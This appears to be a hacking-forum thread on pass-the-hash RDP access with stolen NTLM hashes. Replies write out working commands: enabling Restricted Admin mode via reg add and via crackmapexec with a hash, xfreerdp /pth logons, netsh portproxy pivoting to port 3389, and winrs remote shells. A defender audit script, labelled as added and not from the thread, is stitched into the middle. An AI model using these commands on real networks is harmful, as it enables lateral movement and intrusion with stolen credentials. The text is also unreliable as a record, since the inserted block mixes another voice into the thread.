
rdp account restriction

Sec13B (L3) cache
User
Registered: 05.01.2023
Messages: 257
Reactions: 39
I have only the NTLM hash for almost every user, but right now I can access only a few of the local RDP IPs.
My question: is there any method to run:
Code:
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

xfreerdp /u:test /pth:5385930931b42e516a906cfe4e332ade /v:172.31.209.10 +window-drag
The only open port is 3389.

Same; in any case I need DisableRestrictedAdmin if I use xfreerdp.
As I see in the photo, you're in a lab, not in a corp outside the network?! Also, this happens because you use the hash; try to crack it and use the clear password.
 
Code:
crackmapexec rdp 172.31.209.10 -u test -H 5385930931b42e516a906cfe4e332ade -x 'cmd /c powershell New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DisableRestrictedAdmin" -Value "0" -PropertyType DWORD -Force'
 
In PowerShell
Code:
Get-Service iphlpsvc
netsh interface portproxy add v4tov4 listenaddress=10.10.10.10 listenport=4444 connectaddress=172.31.209.10 connectport=3389
mstsc.exe /v:10.10.10.10:4444
netsh interface portproxy show all
netsh interface portproxy delete v4tov4 listenport=4444 listenaddress=10.10.10.10
netsh interface portproxy reset
WinRM port: 5985
Code:
Test-NetConnection -ComputerName 172.31.209.10 -Port 5985
winrs -r:http://172.31.209.10:5985 "hostname"
winrs -r:http://172.31.209.10:5985 "cmd"
winrs -r:comp.windomain.local -u:user -p:P@ssw0rd "powershell"
"WinRM -?" examples:
Code:
winrs -r:https://myserver.com command
winrs -r:myserver.com -usessl command
winrs -r:myserver command
winrs -r:http://127.0.0.1 command
winrs -r:http://169.51.2.101:80 -unencrypted command
winrs -r:https://[::FFFF:129.144.52.38] command
winrs -r:http://[1080:0:0:0:8:800:200C:417A]:80 command
winrs -r:https://myserver.com -t:600 -u:administrator -p:$%fgh7 ipconfig
winrs -r:myserver -env:PATH=^%PATH^%;c:\tools -env:tEMP=d:\temp config.cmd
winrs -r:myserver netdom join myserver /domain:testdomain /userd:johns /passwordd:$%fgh789
winrs -r:myserver -ad -u:administrator -p:$%fgh7 dir \\anotherserver\share
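A defender-side audit of the two host changes this thread turns on, the Lsa DisableRestrictedAdmin value (RDP accepts hash-only logons only while it is 0) and netsh portproxy forwarders: an added example, not code from the thread, run elevated on the host being checked; it assumes portproxy rules are persisted under HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp.

```powershell
# Added audit script (not from the thread). Reports whether Restricted Admin mode is on
# (DisableRestrictedAdmin = 0, the state the thread's reg add / crackmapexec commands create)
# and lists netsh portproxy forwarders, which netsh persists in the registry so they survive
# a reboot. Assumed registry location for portproxy rules is marked below.
$LsaKey   = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
$ProxyKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp'   # assumed path

function Get-RestrictedAdminState {
    $item = Get-ItemProperty -Path $LsaKey -Name DisableRestrictedAdmin -ErrorAction SilentlyContinue
    if ($null -eq $item) {
        return 'DisableRestrictedAdmin absent: Restricted Admin mode off'
    }
    if ($item.DisableRestrictedAdmin -eq 0) {
        return 'DisableRestrictedAdmin = 0: Restricted Admin ON, RDP accepts NTLM-hash logons'
    }
    return "DisableRestrictedAdmin = $($item.DisableRestrictedAdmin): Restricted Admin mode off"
}

function Get-PortProxyForwarders {
    # Each v4tov4 rule is stored as value name 'listenaddr/listenport' with data 'connectaddr/connectport'
    $key = Get-Item -Path $ProxyKey -ErrorAction SilentlyContinue
    if ($null -eq $key) { return @() }
    foreach ($name in $key.GetValueNames()) {
        [pscustomobject]@{ Listen = $name; ForwardTo = $key.GetValue($name) }
    }
}

# Report
Write-Output (Get-RestrictedAdminState)
$rules = @(Get-PortProxyForwarders)
if ($rules.Count -eq 0) {
    Write-Output 'No netsh portproxy forwarders found'
} else {
    Write-Output "$($rules.Count) portproxy forwarder(s) present; entries forwarding to 3389 or 5985 deserve a look:"
    $rules | Format-Table -AutoSize
}
# portproxy only works while the IP Helper service is running, so its state is part of the picture
$svc = Get-Service iphlpsvc -ErrorAction SilentlyContinue
if ($svc) { Write-Output "iphlpsvc (IP Helper, required by portproxy) is $($svc.Status)" }
```

Clearing forwarders found this way is the `netsh interface portproxy reset` already shown above; the DisableRestrictedAdmin value should be removed or set back to 1 unless Restricted Admin mode is an intentional policy.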
 
Did it work for you? Or what is that!